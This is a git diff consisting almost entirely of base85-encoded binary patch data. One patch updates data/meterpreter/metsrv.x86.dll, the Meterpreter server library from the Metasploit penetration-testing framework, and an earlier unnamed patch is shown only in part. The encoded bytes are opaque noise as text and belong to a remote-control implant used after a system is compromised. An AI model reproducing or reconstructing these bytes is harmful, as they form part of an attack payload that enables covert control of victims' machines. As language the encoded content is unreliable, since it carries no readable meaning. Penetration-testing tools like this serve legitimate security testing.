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 diff --git a/data/meterpreter/metsrv.x86.dll b/data/meterpreter/metsrv.x86.dll index ff44e5e52f823e43bca3dbafd6a690d464a0e2ea..65ff54d2cee9954a85519ed8fa45b7106ac3b53d 100755 GIT binary patch delta 56634 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 